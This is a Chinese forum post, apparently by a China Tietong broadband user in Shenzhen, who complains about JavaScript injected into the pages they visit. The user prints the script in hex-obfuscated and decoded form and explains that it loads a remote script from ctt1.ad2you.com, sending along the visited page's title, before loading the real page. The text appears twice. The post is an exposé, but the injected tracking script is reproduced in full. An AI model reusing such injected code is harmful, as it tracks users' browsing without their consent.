下面的这个截图是我这边最近经常出现的一个网络问题...这是具体的代码:var _0xccce=[
"\x67\x67",
"\x67\x64",
"\x63\x71",
"\x3C\x73\x63\x72\x69\x70\x74\x20\x6C\x61\x6E\x67\x75\x61\x67\x65\x3D\x27\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x27\x20\x73\x72\x63\x3D\x27\x68\x74\x74\x70\x3A\x2F\x2F\x63\x74\x74\x31\x2E\x61\x64\x32\x79\x6F\x75\x2E\x63\x6F\x6D\x2F\x69\x70\x75\x73\x68\x2E\x70\x68\x70\x3F\x73\x72\x63\x3D",
"\x26\x74\x3D",
"\x74\x69\x74\x6C\x65",
"\x26\x75\x3D\x25\x73",
"\x27\x3E\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E",
"\x77\x72\x69\x74\x65",
"\x3C\x73\x63\x72\x69\x70\x74\x20\x6C\x61\x6E\x67\x75\x61\x67\x65\x3D\x27\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x27\x20\x73\x72\x63\x3D\x27",
"\x25\x73"
];
var a=[_0xccce[0x0],_0xccce[0x1],_0xccce[0x2]];
var s=_0xccce[0x3]+a[0x1]+_0xccce[0x4]+encodeURIComponent(document[_0xccce[0x5]])+"&u=sabsvkdgbiQn"+_0xccce[0x7];
document[_0xccce[0x8]](s);
s=_0xccce[0x9]+"http://www.lkbook.org/html/21/21613/index.html"+_0xccce[0x7];
document[_0xccce[0x8]](s); 这是一段JS代码,用16进制进行了加密...
翻译过来是这样的:
var _0xccce=[
"gg",
"gd",
"cq",
"<script language='javascript' src='http://ctt1.ad2you.com/ipush.php?src=",
"&t=",
"title",
"&u=%s,'></script>",
"write",
"<script language='javascript' src='",
"%s"
];var a=[_0xccce[0],_0xccce[1],_0xccce[2]];
var s=_0xccce[3]+a[1]+_0xccce[4]+encodeURIComponent(document[_0xccce[5]])+"&u=sabsvkdgbiQn"+_0xccce[7];
document[_0xccce[8]](s);
s=_0xccce[9]+"http://www.lkbook.org/html/21/21613/index.html"+0xccce[7];
document[_0xccce[8]](s);这段JS代码作用有两个:
1.document.write("<script language='javascript' src='http://ctt1.ad2you.com/ipush.php?src=gd&t=我要访问的网站的标题&u=sabsvkdgbiQn&u=%s,'></script>",)
把你要访问的网站的信息传给http://ctt1.ad2you.com/ipush.php这个网页...2.document.write("<script language='javascript' src='我要访问的网站的网址&u=%s'></script>")
然后跳转到你所要访问的网站...这种事让人很郁闷,一个是它会收集你一网的信息,鬼知道它后面做到了什么程度..还有就是访问网站老是会出错,直接影响了正常的工作,让人抓狂...我这是铁通的网...在深圳不知道哪些兄弟现在也要面对同样的事...有没有哪个NB人可以说说,这是谁她妈的干的...
"\x67\x67",
"\x67\x64",
"\x63\x71",
"\x3C\x73\x63\x72\x69\x70\x74\x20\x6C\x61\x6E\x67\x75\x61\x67\x65\x3D\x27\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x27\x20\x73\x72\x63\x3D\x27\x68\x74\x74\x70\x3A\x2F\x2F\x63\x74\x74\x31\x2E\x61\x64\x32\x79\x6F\x75\x2E\x63\x6F\x6D\x2F\x69\x70\x75\x73\x68\x2E\x70\x68\x70\x3F\x73\x72\x63\x3D",
"\x26\x74\x3D",
"\x74\x69\x74\x6C\x65",
"\x26\x75\x3D\x25\x73",
"\x27\x3E\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E",
"\x77\x72\x69\x74\x65",
"\x3C\x73\x63\x72\x69\x70\x74\x20\x6C\x61\x6E\x67\x75\x61\x67\x65\x3D\x27\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x27\x20\x73\x72\x63\x3D\x27",
"\x25\x73"
];
var a=[_0xccce[0x0],_0xccce[0x1],_0xccce[0x2]];
var s=_0xccce[0x3]+a[0x1]+_0xccce[0x4]+encodeURIComponent(document[_0xccce[0x5]])+"&u=sabsvkdgbiQn"+_0xccce[0x7];
document[_0xccce[0x8]](s);
s=_0xccce[0x9]+"http://www.lkbook.org/html/21/21613/index.html"+_0xccce[0x7];
document[_0xccce[0x8]](s); 这是一段JS代码,用16进制进行了加密...
翻译过来是这样的:
var _0xccce=[
"gg",
"gd",
"cq",
"<script language='javascript' src='http://ctt1.ad2you.com/ipush.php?src=",
"&t=",
"title",
"&u=%s,'></script>",
"write",
"<script language='javascript' src='",
"%s"
];var a=[_0xccce[0],_0xccce[1],_0xccce[2]];
var s=_0xccce[3]+a[1]+_0xccce[4]+encodeURIComponent(document[_0xccce[5]])+"&u=sabsvkdgbiQn"+_0xccce[7];
document[_0xccce[8]](s);
s=_0xccce[9]+"http://www.lkbook.org/html/21/21613/index.html"+0xccce[7];
document[_0xccce[8]](s);这段JS代码作用有两个:
1.document.write("<script language='javascript' src='http://ctt1.ad2you.com/ipush.php?src=gd&t=我要访问的网站的标题&u=sabsvkdgbiQn&u=%s,'></script>",)
把你要访问的网站的信息传给http://ctt1.ad2you.com/ipush.php这个网页...2.document.write("<script language='javascript' src='我要访问的网站的网址&u=%s'></script>")
然后跳转到你所要访问的网站...这种事让人很郁闷,一个是它会收集你一网的信息,鬼知道它后面做到了什么程度..还有就是访问网站老是会出错,直接影响了正常的工作,让人抓狂...我这是铁通的网...在深圳不知道哪些兄弟现在也要面对同样的事...有没有哪个NB人可以说说,这是谁她妈的干的...
这是铁通挂马的代码
具体分析见午夜客的BLOG
http://blog.wyk.net.ru/WuYeKe-tietongshenweiwuchiqiangxingguama.html